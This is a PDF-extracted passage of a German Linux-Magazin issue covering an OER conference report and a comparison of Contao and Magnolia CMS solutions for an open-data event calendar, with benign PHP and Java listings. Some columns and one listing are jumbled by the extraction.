Onlinekurse zu diversen Themen
an. Die dortige Open
Education Conference geht
zudem in die zehnte Runde.
In Deutschland gibt es erst
seit 2013 eine nennenswerte
Anzahl von MOOCs. Einer
davon war das COER 13, die
Erfahrungen mit dem MOOC
stellte der Tübinger Wissenschaftler
Markus Schmidt vor.
Er zeigte ganz praktisch, wie
sich solche Onlinekurse umsetzen
lassen, wo es Material
gibt, wie kommuniziert wird,
was gut funktioniert und wo
es noch Defizite gibt.
Etwas theoretischer wurde es
bei den Forscherinnen Kerstin
Mayrberger und Sandra Hofhues.
Sie stellten Thesen zu
OER in den Raum. Eine davon
lautete etwa, die Lehrenden
und Lernenden möchten offen
sein, können aber nicht
mit der Offenheit umgehen.
Anwesende Lehrer sahen
die Probleme eher bei der
schlechten Ausstattung mit
Hardware, fehlenden didaktischen
Konzepten und einem
generellen Defizit im Umgang
mit Technik an den Schulen.
Unter einem Dach
Es war eines der Verdienste
der Konferenz, Menschen mit
unterschiedlichen Perspektiven
auf OER an einem Ort zu
versammeln. Bislang verfolgen
die Webseiten, Projekte
und Organisationen verschiedene
Strategien und Ansätze,
klaffen Ideal und Praxis häufig
weit auseinander.
Es sei eine typische Graswurzelbewegung,
sagt Elly
Köpf, Projektmanagerin bei
Wikimedia. Sie hat die Veranstaltung
zusammen mit einem
Kollegen initiiert. Auch
Catrin Schoneville erwartete
noch keine konkreten Ergebnisse
von der Konferenz. Es
wäre ein Erfolg, wenn die so
Vernetzten weiterhin zusammenarbeiten
würden.
Lösungsorientiert
Trotz der offenen Probleme
gab es auch Lichtblicke. Zu
diesen gehörte beispielsweise
ein recht junges Team aus
München, das die Webseite
Serlo.org [2] betreibt. Es entwickelt
seine Wikipedia-artige
Matheplattform, die bisher vor
allem Schüler nutzen, in der
Freizeit. Die Site lässt ahnen,
wie die Zukunft von OER aussehen
könnte: Die Inhalte sind
übersichtlich aufbereitet, das
Projekt lässt der Community
freie Hand, einzelne Module
finanziert man mitunter auch
über Crowdfunding [3]. n
Infos
[1] Konferenzwebseite:
[http:// www. wikimedia. de/​
wiki/ OERde13]
[2] OER-Seite Serlo.org: [http://​
www. serlo. org]
[3] Crowdfunding für Serlo.org:
[http:// www. betterplace. org/​
en/ projects/ 4011‐finally‐under
stand‐math‐with‐serlo‐org]

Vier Frameworks und CMS erhalten die gleiche Programmieraufgabe gestellt
Reifeprüfung fürs Web
Einführung 11/2013
Titelthema
Das Linux-Magazin lässt vier freie Content Management Systeme und Webframeworks antreten. Sie sollen zeigen,
wie sie einen Veranstaltungskalender auf Grundlage externer Daten umsetzen. Mathias Huber
Inhalt
22 Contao
Das PHP-System Contao packt die Erweiterung
in ein eigenes Modul.
28 Magnolia
CMS Standardkomponenten aus der
Java-Welt und Templates sorgen für
Ordnung.
34 Ruby on Rails
Mit wenigen Zeilen entsteht die Serverseite,
auf dem Client arbeitet das
Framework Angular.js.
39 Django­
Das Python-Webframework wiederholt
sich nicht gerne und führt in wenigen
Schritten zum Ziel.
46 Bewertung­
Die Redaktion sichtet die Stärken
und Schwächen der angetretenen
Systeme.
48 Sicherheit­
Interview über die Security von Open-
Source-CMS.
Wer heute eine Website aufsetzt, fängt
nicht mehr bei Null an. Für einen soliden
Unterbau sorgen Content Management
Systeme oder Webframeworks, die gerade
die Open-Source-Welt in großer Auswahl
bietet. Damit sind Navigation sowie Übersichts-
und Detailseiten rasch in einem
einheitlichen Layout umgesetzt. Schon
fast zum Standard gehören daneben Formularauswertung,
Bilderverwaltung und
eine automatisch erzeugte Sitemap.
Die Spreu vom Weizen dagegen trennt
sich, wenn der Web entwickler Anforderungen
umsetzen möchte, für die das System
keine fertige Lösung anbietet. Daher
hat die Redaktion den Herstellern und
Communities hinter der Software eine
überschaubare Programmieraufgabe gestellt.
Wer, wenn nicht die Macher, sollte
die Stärken der Technologien zeigen?
Die Prüflinge sollten eine Liste von regionalen
Volks- und Straßenfesten auf
einer Website anzeigen. Die Daten dazu
finden sich auf der Open-Data-Plattform
des Landes Berlin [1]. Sie sind über ein
REST-API in den Formaten XML oder
Json abzurufen. Die Aufgabe für den Anwendungsentwickler
besteht darin, eine
Übersichtsseite für den aktuellen Monat
sowie eine Detailseite für jeden Eintrag
umzusetzen. In der Übersicht kann der
Besucher zudem nach Festen suchen,
indem er mit einem Kalender-Widget einen
Von-Bis-Zeitraum einstellt. Die Daten
kann der Programmierer zwischenspeichern
oder immer wieder neu abrufen.
Im Testfeld treten an: Die Content-Management-Systeme
Contao (vormals Typolight)
und Magnolia CMS sowie die
Frameworks Django und Ruby on Rails.
Damit sind die Programmiersprachen
PHP, Java, Python und Ruby vertreten.
Die vorgestellten Lösungen zeigen die
Vielfalt der Tools, Bibliotheken, Ansätze
und Arbeitsstile.
Programmiert und
kommentiert
Die Artikel dieses Themenschwerpunkts
haben in der Regel zwei Urheber: den
Programmierer, der den Code der Beispielanwendung
geschrieben hat und den
Autor des Artikels, der den Code im Text
kommentiert und bewertet. Lediglich bei
Django stammen Programm und Artikel
aus der selben Feder. Sven Schannak griff
zunächst selbst zum Code-Editor, erhielt
aber buchstäblich in letzter Minute noch
Unterstützung aus der Community.
Die Auswertung der eingereichten Lösungen
versucht, neben der Platzierung vor
allem die Stärken und Schwächen der
einzelnen Technologien hervorzuheben.
Es wäre schön, wenn sie den Projekten
hinter den Systemen und Frameworks als
Anregungen für die künftige Weiterentwicklung
dienten.
Nach dem Programmierwettstreit, in dem
Systeme und Entwickler zeigen, wie anpassbar
und produktiv sie sind, wendet
sich dieser Schwerpunkt noch einem
anderen Aspekt zu: CMS und Frameworks
fürs Web tauchen regelmäßig in
den Security-Advisories der Linux-Distributionen
und Sicherheitsdienstleister
auf. Kein Wunder, im Internet sind sie
potenziell zahllosen Arten von Angriffen
ausgesetzt. Eine Studie im Auftrag des
Bundesamts für Sicherheit in der Informationstechnik
(BSI) hat nun einige Vertreter
dieser Softwaregattung untersucht,
um unter anderem festzustellen, wie gut
sie den Attacken standhalten. n
Infos
[1] Berliner und Brandenburger Volks- und
Straßenfeste 2013: [http://​­daten.​­berlin.​­de/​
­datensaetze/​­berliner‐und‐brandenburger‐­
volks‐und‐stra%C3%9Fenfeste‐2013]
www.linux-magazin.de
21

Titelthema
www.linux-magazin.de Contao 11/2013
22
Erweiterungen im PHP-CMS Contao
Schneller war keiner
Binnen eines Tages konnte der beauftragte Contao-Experte Code vorlegen, der die Programmieraufgabe löst.
Mängel bei der verfügbaren Dokumentation nehmen jedoch Außenstehenden die Chance, Erweiterungen in
vergleichbarer Zeit auf die Beine zu stellen. Tim Schürmann
gibt lediglich seinem Modul einen neuen
Namen, hakt ab, ob es sich um ein Modul
für das Front- oder Backend handelt, und
legt fest, welche Sprachen das Modul später
sprechen soll. Anschließend muss er
bloß noch die erzeugten Klassen-Skelette
und Konfigurationsdateien ausfüllen. Der
beauftragte Contao-Experte (siehe Kasten
„Der Programmierer“) ist diesen
Weg aber nicht gegangen.
Der Anlasser
© Frank Peters, 123RF.com
Contao [1] ist ein freies Content-Management-System,
das im Gegensatz zu vielen
seiner Kollegen seitenorientiert arbeitet.
Dabei legt der Administrator zunächst die
Seitenstruktur des Internetauftritts fest
und füllt dann die Seiten nach und nach
mit Inhalten. Contao erschien 2004 unter
dem Namen Typolight. Nutzer verwechselten
es jedoch häufig mit Typo3, zudem
deutete „light“ auf ein funktionsarmes
System hin – fälschlich.
Typolight-Erfinder und ‐Hauptentwickler
Leo Feyer wechselte deshalb mit der Version
2.6 zum weniger missverständlichen
Namen Contao. Seit 2012 betreut die Weiterentwicklung
die dafür in der Schweiz
gegründete Contao Association [2]. Obwohl
sich das leicht erweiterbare und
flott agierende CMS steigender Beliebtheit
erfreut, erreicht es bei Weitem nicht
den Verbreitungsgrad seiner direkten Konkurrenten
Joomla oder Drupal.
Contao steht unter der GNU LGPL, für
500 Euro lässt sich aber auch eine kommerzielle
Lizenz erwerben, aus der Lizenznehmer
sämtliche Hinweise auf Contao
und Leo Feyer entfernen dürfen. Die
Implementierung der Beispielaufgabe lief
unter der bei Redaktionsschluss aktuellen
Versionsnummer 3.1.2, als Testsystem
diente Ubuntu 13.04.
Modul unter Modulen
Die Inhalte einer Webseite erzeugen in
Contao so genannte Module. Sie zapfen
die Datenbank an, gießen dann die fertigen
Daten und Texte in einen kleinen
Schnipsel HTML-Code und übergeben
diesen dem Content-Management-System.
Contao setzt dann aus den angelieferten
HTML-Stücken nach einem
Bauplan die komplette Seite zusammen.
Auch die kleine Beispielaufgabe löst folglich
ein Modul. Es fragt die anstehenden
Feste beim Dienst ab, bereitet sie auf und
gibt sie in einer schicken Tabelle aus.
Contao selbst enthält einen Extension-
Creator, der das Code-Skelett eines neuen
Moduls ausspuckt. Der Programmierer
Den Kern eines Moduls bildet ein PHP-
Skript. In ihm leitet der Programmierer
von der Klasse »Modul« eine eigene ab
und überschreibt die Methoden »generate()«
und »compile()«. Den Contao-
Konventionen zufolge muss die abgeleitete
Klasse den gleichen Namen wie
das Modul mit einem vorangestellten
»Module« tragen. Wie in Listing 1 zu
besichtigen ist, hat der Programmierer
das Modul »LinuxMagazin« getauft, seine
eigene Klasse heißt folglich »ModuleLinuxMagazin«.
Der Name dieser Klasse
stiftet übrigens zudem den Dateinamen
des PHP-Skripts.
Wenn das Modul seine Ausgaben zusammenstellen
und ausspucken soll, ruft Con-
Der Programmierer
Der Code für die Lösung der Aufgabe in diesem
Artikel stammt von Andreas Schempp,
Hauptentwickler des Contao-Shopsystems
Isotope E-Commerce, Leiter der Contao Arbeitsgruppe
Core-Entwicklung und im Vorstand
der Contao Association [2].
Beruflich arbeitet er als Mitinhaber bei der
Terminal42 GmbH, welche kleine und mittlere
Agenturen bei deren Contao-Projekten
in den Bereichen Entwicklung und Layout-
Umsetzung unterstützt.

Abbildung 1: Die Ausgaben des Moduls im Frontend. Die kleinen Kalendersymbole stammen von Contaos
Javascript-Framework Mootools.
tao seine öffentliche Methode »generate()«
auf. Diese prüft in Listing 1 zunächst, ob
sie das Backend aufgerufen hat:
if (TL_MODE == 'BE') { ... }
Wenn dies der Fall ist, übergibt »generate()«
lediglich ein paar Informationen
an Contao, den Namen des Moduls beispielsweise,
die dann wiederum das Backend
anzeigt. Andernfalls soll das Modul
seine Informationen im Frontend und
somit den Besuchern präsentieren. Als
Vorbereitung darauf lädt »generate()« ab
Zeile 21 erst einmal mehrere Stylesheets
aus dem Unterverzeichnis »assets«, welche
später die Informationen des Moduls
etwas aufhübschen.
Als Nächstes bindet »generate()« etwas
Javascript-Code ein. Dieser stammt nicht
vom Programmierer des Moduls, sondern
aus dem in Contao bereits enthaltenen
Javascript-Framework Mootools [3]. Der
hinzugeholte Javascript-Code erzeugt
die kleinen Kalendersymbole, über die
Besucher später bequemer ein Datum
auswählen können (in Abbildung 1 die
kleinen grünen Symbole).
Zum Schluss ruft »generate()« noch
ihre Kollegin in der Oberklasse auf. Die
wiederum aktiviert die private Methode
»compile()«, welche die eigentlichen Daten
zusammenstellt und ausgibt. In der
Implementierung aus Listing 1 holt sie
zunächst die Daten im Json-Format von
»berlin.de« ab und presst sie in Zeile 41
in ein handlicheres Array. Anschließend
prüft die Methode, ob die ganzen Informationen
auf eine Seite passen oder ob
das Modul sie besser auf mehrere Seiten
verteilen sollte.
Die Vorlage
Die nun vorliegenden Termindaten könnte
das Modul einfach so unformatiert ausgeben.
Besser ist es jedoch, sie in eine
HTML-Tabelle zu verpacken. Den dazu
notwendigen PHP-Code lagert Contao in
eine eigene Datei aus, das so genannte
Template. Dies bietet den Vorteil, dass die
Darstellung der Ausgaben von der eigentlichen
(Modul-)Logik getrennt ist.
Wie die Datei mit dem Template heißt,
teilt das Modul über das Attribut
»$strTemplate« mit (Zeile 3 in Listing 1).
Die Klasse »ModuleLinuxMagazin« kann
dann über das Objekt »$this‐>Template«
die Termine der Straßenfeste in das Template
schieben, was in Listing 1 ab Zeile
58 geschieht. Die erste Zeile macht das
Array »$arrData« unter dem Namen »results«
im Template verfügbar. Nach dem
gleichen Prinzip injizieren auch die nach-
Joomla
Die Redaktion wollte ursprünglich Joomla als
Vertreter für ein per PHP zu erweiterndes
CMS antreten lassen. Allerding ließ sich über
Wochen kein Projektmitglied auftreiben, das
bereit war, sich der Programmieraufgabe
zu stellen. Dies und eigene Recherchen legen
nahe, dass das Programmieren eigener
Joomla-Module sehr aufwändig ist. Schon ein
„Hello World“-Modul erfordert große Mengen
Code zu verfassen, die auf ein ganzes Bündel
Dateien zu verteilen sind.

Listing 1: »ModuleLinuxMagazin«-Klasse (Ausschnitte)
01
04
05
06 Name der Veranstaltung
07 Beginn 
?
08 Ende
09
10
11 Straße
12 PLZ und Ort
13 Zeiten
14
15
16 Veranstalter
17 E‐Mail
18 Internet
19
20
21 Bemerkungen
22
23
24
25
26
27
28
29
30
31
33
34
35
36
38
39
40
41
43 {{email::}}
44
45
46

Abbildung 2: Die DCA-Datei erzeugt dieses Formular, das später der normale Benutzer angezeigt bekommt.
folgenden Zeilen weitere Daten in das
Template.
Im Template sind damit jetzt alle Termine
im Array »$this‐>results« verfügbar.
Es genügt dort somit eine »foreach()«-
Schleife, um die Zeilen der Ergebnistabelle
aufzubauen. Den Code zeigt Listing
2. Der Programmierer der Beispielaufgabe
stellt der Tabelle zudem ein Formular
voran, über das die Besucher später
die Tabelle nach bestimmten Kriterien filtern
lassen können (wie in Abbildung 1).
Die eigentliche Filterung übernimmt das
PHP-Modul anhand der »POST«-Daten.
Das komplette Template wandert in eine
eigene Datei im Unterverzeichnis »templates«
– normalerweise sogar in zweifacher
Ausführung: Die ».html5«-Datei
enthält Tags gemäß HTML-5-Standard,
die zweite Datei mit der Endung ».xhtml«
verwendet hingegen das ältere XHTML.
Der Administrator von Contao darf später
im Backend zwischen HTML 5 und
XHTML umschalten. Abhängig von seiner
Wahl kommt automatisch das HTML-5-
oder XHTML-Template zum Einsatz. Der
Programmierer des Beispiels hat jedoch
auf die XHTML-Variante verzichtet.
Babelfisch
In der Umsetzung der Beispielaufgabe
sind die Beschriftungen der Tabellenspalten
auf Deutsch. Übersetzungen hat der
Programmierer nicht vorgesehen. Normalerweise
liegen diese im Unterverzeichnis
»languages«, in dem es für jede Sprache
ein weiteres Unterverzeichnis mit dem
jeweiligen Sprachkürzel gibt. Die Datei
namens »modules.php« steuert die Modulnamen,
im Beispielprojektenthält jedoch
die folgenden zwei Zeilen:
$GLOBALS['TL_LANG']['MOD']['linuxmagazin']U
= array('Linux Magazin Demo');
$GLOBALS['TL_LANG']['FMD']['linuxmagazin']U
= array('Linux Magazin Demo');
Sie sorgen dafür, dass später das Modul
unter dem Namen »Linux Magazin
Demo« erscheint. Übersetzungen würden
Contao-Entwickler meist in die »default.
php«-Sprachdatei platzieren.
Bürokratisch
Schließlich bringt die Implementierung
die Datei »dca/tl_module.php« mit, die
gewöhnlich beschreibt, wie die vom Modul
genutzten Datenbanktabellen und ihre
Beziehungen zueinander aussehen. Contao
bezeichnet die Definitionen als Data
Container Arrays, kurz DCA. Die Implementierung
braucht davon jedoch keinen
Gebrauch zu machen, sondern definiert
dort nur eine so genannte Palette. Das ist
eine Sammlung aus Formularfeldern:
$GLOBALS['TL_DCA']['tl_module']['palettes']U
['linuxmagazin'] = '{title_legend},name,U
headline,type;{protected_legend:hide},U
protected;{expert_legend:hide},guests,U
cssID,space';
Dieses Formular zeigt später das Backend
an. In diesem Fall besteht es aus ein
paar Standardfeldern. Ihretwegen darf
das Modul einige Contao-Features, wie

Titelthema
www.linux-magazin.de Contao 11/2013
26
01 ;;
die Überschrift und die Zugriffskontrolle,
mitnutzen (Abbildung 2). Die recht kryptische
DCA-Syntax ist in [4] erläutert.
Eingehängt
Dank der Datei »config/config.php« erkennt
Contao das Modul als solches. Im
konkreten Fall lautet ihr Inhalt nur:
$GLOBALS['FE_MOD']['miscellaneous']U
['linuxmagazin'] = 'ModuleLinuxMagazin';
Hier registriert die Datei ein Modul für
das Frontend (»FE_MOD«) und ordnet es
in die Gruppe „Verschiedenes“ (»miscellaneous«)
ein. Sie sorgt später im Backend
in den Auswahllisten lediglich für etwas
mehr Übersicht (siehe Abbildung 3). Des
Weiteren trägt das Modul den Namen
»linuxmagazin«. Die zugehörige Klasse
heißt »ModuleLinuxMagazin«.
Damit Contao 3 Klasse und Template laden
und aufrufen kann, bedarf es einer
»config/autoload.php« wie in Listing 3.
Die erste Anweisung teilt Contao mit,
dass es die Datei »ModuleLinuxMagazin.
php« laden soll, wenn die Ausgaben der
Klasse »ModuleLinuxMagazin« her müssen.
Analog registriert die zweite Anweisung
das Template: Wenn das Modul das
»mod_linuxmagazin«-Template verlangt,
01 ClassLoader::addClasses(array
02 (
Listing 3: Der Autoloader
03 'ModuleLinuxMagazin' => 'system/modules/
linuxmagazin/ModuleLinuxMagazin.php',
04 ));
05
06 TemplateLoader::addFiles(array
07 (
08 'mod_linuxmagazin' => 'system/modules/linuxmagazin/
templates',
09 ));
Listing 4: »autoload.ini«
02 ; List modules which are required to be loaded
beforehand
03 ;;
04 requires[] = "core"
05
06 ;;
07 ; Configure what you want the autoload creator to
register
08 ;;
09 register_namespaces = false
10 register_classes = false
11 register_templates = false
Abbildung 3: Um etwas mehr Ordnung zu schaffen,
gruppiert Contao die Module.
weiß Contao, wo es die Datei findet.
Zur »autoload.php« gesellt sich eine »autoload.ini«,
welche unter anderem die Abhängigkeiten
zu anderen Modulen verrät.
Die »autoload.ini« für die Beispielaufgabe
zeigt Listing 4. Beide Autoload-Dateien
lassen sich im Backend mit dem Autoload-Creator
automatisch generieren.
Wählerischer Einspieler
Contao besitzt eine Erweiterungsverwaltung,
um Module zu installieren und zu
aktivieren. Sie zapft aber nur den offiziellen
Erweiterungskatalog der Contao-
Homepage an. Wer sein Modul aus anderen
Quellen besorgt oder gar selbst programmiert,
muss es per Hand in ein Unterverzeichnis
von »system/modules« des
Webservers kopieren und den Installationsassistenten
aufrufen.
Letzterer richtet nicht nur Contao auf
dem Webserver ein, er prüft und aktualisiert
auch die Datenbanktabellen. Es
bleibt unklar, warum die Contao-Entwickler
diesen fehleranfälligen Weg gehen
und der Erweiterungsverwaltung
keine Upload-Funktion
spendieren. Da die Implementierung
der Beispielaufgabe
die Daten-
Datei
bank nichtanfass, genügte
es, sie in das entsprechende
Contao-Verzeichnis
zu kopieren. dca/​tl_module.php
config/​autoload.ini
Wertung
Insgesamt elf Dateien
in fünf Verzeichnissen
benötigt das Modul,
um die Beispielaufgabe zu lösen (siehe
Tabelle 1). Die meiste Arbeit leistet das
Skript »ModuleLinuxMagazin.php« zusammen
mit seinem Template »mod_linuxmagazin.html5«.
Normalerweise
würden noch weitere Dateien hinzukommen,
etwa Übersetzungen. Dank Contaos
eingebauten Erweiterungsgenerator spart
der Einsteiger immerhin Tipparbeit.
Die Implementierung der Beispielaufgabe
zeigte zudem, dass Contao-Programmierer
tunlichst Kommentare hinterlassen
und den Quellcode gut formatieren sollten.
Insbesondere das Template tendiert
schnell zu kryptischen Textwüsten. Davon
abgesehen fällt der Einstieg in den Code
erstaunlich leicht. Auch die Implementierung
der Beispielaufgabe erschließt sich
recht schnell, obwohl der Pro grammierer
in der Kürze der Zeit keine Kommentare
hinterlassen hat.
Voraussetzung ist allerdings, dass der
Entwickler mit den Konzepten von Contao
vertraut ist. Mangels Dokumentation
gestaltet sich das jedoch für jeden Einsteiger
schwierig. So war zum Redaktionsschluss
zwar das Benutzer-, nicht
aber das Entwicklerhandbuch und somit
die einzige vollständige Dokumentation
auf der Contao-Homepage verfügbar. Die
meisten Anleitungen im Internet sind entweder
veraltet oder werfen mehr Fragen
auf, als sie klären. (jk)
n
Infos
[1] Contao: [https:// contao. org/ de/]
[2] Contao Association:
[https:// association. contao. org]
[3] Mootools: [http:// mootools. net]
[4] Data Container Arrays:
[https:// contao. org/ de/ manual/ 3. 1/​
data‐container‐arrays. html]
Tabelle 1: Die Dateien des Moduls im Überlick
Bedeutung
ModuleLinuxMagazin.php Zentrale Klasse, die Contao
aufruft
templates/​mod_linuxmagazin.php Template
languages/​en/​modules.php Englische Übersetzungen
DCA-Definitionen
Konfigurationsdatei für den
Autoloader
config/​autoload.php
Konfigurationsdatei für den
Autoloader
config.php
Meldet das Modul bei Contao an
assets/​
Stylesheets

Titelthema
www.linux-magazin.de Magnolia CMS 11/2013
28
Das in Java implementierte Magnolia CMS
Blühender Content-Baum
Magnolia CMS nutzen große Anwender wie Lovefilm oder EADS für ihre Webpräsenz. Das freie Java-System importiert
externe Daten in ein zentrales Content Repository und macht sie damit auch bearbeitbar. Carsten Zerbst
© Vira Dobosh, 123RF.com
gegebenenfalls notwendige Transformation
geschehen im Autorensystem. Hier
müssen die Fremddaten lokal verfügbar
sein, entweder durch regelmäßiges Abfragen
(Pull-Prinzip) oder das Empfangen
externer Events wie JMS-Nachrichten
(Push-Prinzip).
Das freie Contentmanagement-System
Magnolia CMS existiert seit zehn Jahren
und dient bei einer Reihe von bekannten
Firmen zur Umsetzung des Internetauftritts.
Sein Kerngedanke ist die Trennung
in ein Autorensystem zum Eingeben und
Erfassen von Texten und Bildern auf der
einen Seite und ein Publikationssystem,
das die Inhalte den Nutzern in einem
einheitlichen Layout präsentiert, auf der
anderen.
Der dahinterliegende Server ist in Java
implementiert und fußt auf einer Reihe
von Open-Source-Komponenten wie dem
Servlet-Container Apache Tomcat und
dem Content-Repository Jackrabbit. Magnolia
CMS [1] ist sowohl in einer freien
Der Programmierer
Der Code für die Lösung der Aufgabe in diesem
Artikel stammt aus dem Hause Magnolia
International Ltd. in Basel [1], dem Hersteller
des gleichnamigen CMS. Der Entwickler
Lars Fischer aus der Abteilung Professional
Services hat ihn geschrieben.
wie in einer Enterprise-Edition verfügbar.
Die freie Version steht unter der GPL,
für die kommerzielle Ausgabe bietet die
hinter Magnolia CMS stehende gleichnamige
Firma nicht nur die üblichen
Dienstleistungen, sondern auch zusätzliche
Features wie die Unterstützung von
mehreren Internetdomains oder kommerziellen
JEE-Servern wie Websphere und
Weblogic.
Dieser Artikel zeigt, wie ein Entwickler
Daten aus einer externen Quelle mit Hilfe
von Magnolia CMS 5.0.2 auf den eigenen
Webseiten publiziert. Als Beispiel dienen
die unter [2] verfügbaren Daten über
die Berliner und Brandenburger Volksund
Straßenfeste. Hierfür kommt der
in Abbildung 1 illustrierte Ablauf zum
Einsatz: Der eigentliche Import und die
DELUG-DVD
Die Delug-DVD zu diesem Magazin
enthält eine lauffähige Tomcat-Instanz
DELUG-DVD
mit Magnolia CMS und der Lösung der Programmieraufgabe.
Content Repository
In seiner Lösung der Aufgabe hat der
Programmierer die Daten als Json regelmäßig
vom Berliner Server abgefragt und
in Magnolia CMS importiert. Für die Datenspeicherung
nutzt Magnolia ein Java
Content Repository (JCR). Dahinter steckt
ein baumartiger Datenspeicher, dessen
Knoten beliebige Metadaten tragen sowie
auf Massendaten (Texte, Bilder, Filme
oder Ähnliches) verweisen.
Die Grundidee dieser Speicherform besteht
darin, kleinere Datenmengen wie
hier Veranstaltungsort oder ‐zeit jeweils
als Metadaten eines Knotens abzuspeichern
und erst so spät wie möglich Text,
Author
Instanz
Abfrage von Json
Erstellen von
JCR-Daten
Publikation
Public
Instanz
Rendern von
JCR-Daten
Java Content Repository (JCR)
Browser
Anfrage
Darstellung
Abbildung 1: Import und Ausgabe von Fremddaten in
Magnolia CMS: Das Java Content Repository bildet
den Mittelpunkt des Systems.

XML oder HTML zu erzeugen. Damit stehen
die einzelnen Metadaten-Attribute
für Abfragen über die JCR-Schnittstellen
bereit und müssen nicht aufwändig aus
einem Text extrahiert werden.
Bei Magnolia CMS nutzen sowohl die
Autoreninstanz als auch die für die Auslieferung
an die Endnutzer zuständige
öffentliche Instanz das gemeinsame Java
Content Repository. Damit der Endanwender
keine in Bearbeitung befindlichen
Daten zu sehen bekommt, muss
ein Redakteur die Einträge explizit für die
Veröffentlichung freigeben.
Sobald die Daten freigegeben sind, stehen
sie in der öffentlichen Instanz bereit.
Darauf greifen Endanwender mit ihrem
Browser zu und fragen HTML-Seiten an.
Diese generiert Magnolia durch Kombination
der im JCR enthaltenen Rohdaten
mit einem Template. Die Trennung von
Inhalt und Template hat den Vorteil, dass
sich Inhalt und Aussehen einer Webseite
unabhängig voneinander ändern lassen.
Datenimport
Die eigentlich Umsetzung für die Berliner
Volksfeste gestaltet sich recht schlank,
die Implementation des Imports enthalten
die Listings 1 bis 3. Die kompletten
Quellen für die gelungene und ansprechende
Umsetzung stehen als Maven-
Projekt unter [6] zur Verfügung.
Für Hintergrundprozesse kennt Magnolia
CMS die Basisklasse »MgnlCommand«,
deren Kinder sich über einen Cron-ähnlichen
Mechanismus starten lassen. Die
Konfiguration der zu startenden Klassen
und Startzeiten geschieht bequem über
die Weboberfläche. Für den Import der
Berliner Daten hat der Anwendungsentwickler
die Klasse »EventImporterCommand«
abgeleitet (Listing 1).
Startpunkt des Imports ist die Methode
»execute()« in Zeile 12. Sie ruft zuerst die
Json-Datei ab und wandelt sie mit Hilfe
der Java-Bibliothek Gson [3] in Java-
Objekte um. Dies sind Plain Old Java
Objects (Pojos), einfache Datenobjekte,
die eine Eins-zu-eins-Umsetzung des
Json-Datenmodells in Java darstellen.
Entsprechend sind alle Veranstaltungen
in einem Objekt der Klasse »Index« enthalten,
über die die For-Schleife (Zeilen
27 bis 51) iteriert.
Der Code in der Schleife fragt zunächst
den Startknoten »Berlin Events« für die
Ereignisse im JCR ab oder erzeugt ihn.
Dann prüft er mit »eventExists()«, ob
die Veranstaltung schon bekannt ist, andernfalls
legt er mit »createEventNode()«
einen neuen Knoten dafür an. Nach jeder
Veranstaltung speichert »session.
save()« (Zeile 43) die Änderungen im
JCR. In Listing 2 findet das eigentliche
Magnolia CMS 11/2013
Titelthema
www.linux-magazin.de
29
Listing 1: Laden der Daten und Hauptschleife
01 public class EventImporterCommand extends MgnlCommand {
02
03 [...]
04
05 /**
06 * Ausfuehrungs‐Methode des Magnolia Commands zum Import von
07 * Berliner Volksfesten
08 * @param context Magnolia Context
09 * @return Ergebnis der Import‐Methode (true/false)
10 */
11 @Override
12 public boolean execute(Context context) throws Exception {
13 log.debug("Starte Event Import... ");
14
15 boolean importResult = true;
16
17 try {
18 // Start des Daten‐Imports
19 InputStream input = new URL(importURL).openStream();
20 BufferedReader br = new BufferedReader(new InputStreamReader(
input, "UTF‐8"));
21
22 Gson gson = new Gson();
23
24 VolksfestData data = gson.fromJson(br, VolksfestData.class);
25
26 // Ende des eigentlichen Daten‐Imports, importierte Events werden
verarbeitet
27 for (Index event : data.getIndex()) {
28 if (validEvent(event)) {
29 try {
30 // Erstellung einer Seite im Website‐Tree, falls das Event
31 // gueltige Daten hat und noch nicht vorhanden ist
32 session = MgnlContext.getJCRSession(repository);
33
34 Node parentNode = NodeUtil.createPath(session.
getRootNode(),
35 path, NodeTypes.Page.NAME, false);
36 PropertyUtil.setProperty(parentNode, "mgnl:template",
EVENT_OVERVIEW_TEMPLATE);
37 PropertyUtil.setProperty(parentNode, "title", "Berlin
Events");
38
39 if (!eventExists(parentNode.getPath(), event.getId(),
repository)) {
40 createEventNode(parentNode, event, NodeTypes.Page.NAME);
41 }
42
43 session.save();
44 } catch (Exception e) {
45 log.error("Problem beim erstellen von Content fuer ein Event: "
+ e.getMessage());
46 }
47 } else {
48 log.error("Fehlende Pflichtfelder bei Event (kein Import):");
49 log.error(event.toString());
50 }
51 }
52
53 } catch (Exception e) {
54 log.error("Problem beim Import von Events:" + e.getMessage());
55 importResult = false;
56 }
57
58 log.debug("Event‐Import beendet.");
59
60 return importResult;
61 }
62 [...]
63 }

Titelthema
www.linux-magazin.de Magnolia CMS 11/2013
30
Abbildung 2: Im Magnolia-Seiteneditor kann der Benutzer Veranstaltungen freigeben oder löschen.
Abspeichern der Veranstaltungsdaten in
der Methode »createEventNode()« statt.
Dort legt »NodeUtil.createPath()« pro Veranstaltung
einen neuen JCR-Knoten an
(Zeile 10), »PropertyUtil« speichert die
Daten aus dem Json-Objekt im Knoten.
Das JCR-API bietet nicht nur Schnittstellen
zum direkten Auslesen der Attribute,
sondern auch umfangreiche Abfragemöglichkeiten.
Das nutzt die »eventExists()«-
Methode in Listing 3: Bei mehrfachem
Import soll das CMS selbstverständlich
für bereits bekannte Veranstaltungen
keine neuen Knoten anlegen.
Mit Hilfe einer SQL-ähnlichen Abfragesprache
lassen sich JCR-Knoten anhand
ihres Vaterknotens oder ihrer Metadaten
finden. Das Attribut »id« aus den Originaldaten
dient zur Identifizierung bereits
importierter Veranstaltungen. Diese Suche
stellt eine mächtige Grundlage für
ein CMS dar, da sich neben Standardattributen
(Änderungsdatum, Bearbeiter
und so weiter) auch knotenspezifische
Attribute wie ID oder der Stadtbezirk
verwenden lassen. Auf der anderen Seite
zeigt Listing 2 anhand des »location«-At-
Listing 2: Mappen der Daten und Erzeugen der JCR-Knoten
01 /**
02 * Erstellt eine Event Page
03 *
04 * @param parentNode Parent‐Knoten im Repository fuer das neue Event
05 * @param event einzelnes Event aus REST‐Import
06 * @param eventType definiert den Typ des Events (Webseite oder Content)
07 */
08 protected void createEventNode(Node parentNode, Index event, String
eventType) {
09 try {
10 Node eventNode = NodeUtil.createPath(parentNode, EVENT_PREFIX +
event.getId(), eventType, false);
11 if (StringUtils.equals(NodeTypes.Page.NAME, eventType)) {
12 PropertyUtil.setProperty(eventNode, "mgnl:template",
EVENT_TEMPLATE);
13 PropertyUtil.setProperty(eventNode, "abstract",
event.getBezeichnung());
14 }
15 PropertyUtil.setProperty(eventNode, "id", event.getId());
16 PropertyUtil.setProperty(eventNode, "title",
event.getBezeichnung());
17 PropertyUtil.setProperty(eventNode, "eventTitle",
event.getBezeichnung());
18 PropertyUtil.setProperty(eventNode, "date", DateUtils.parseDate(
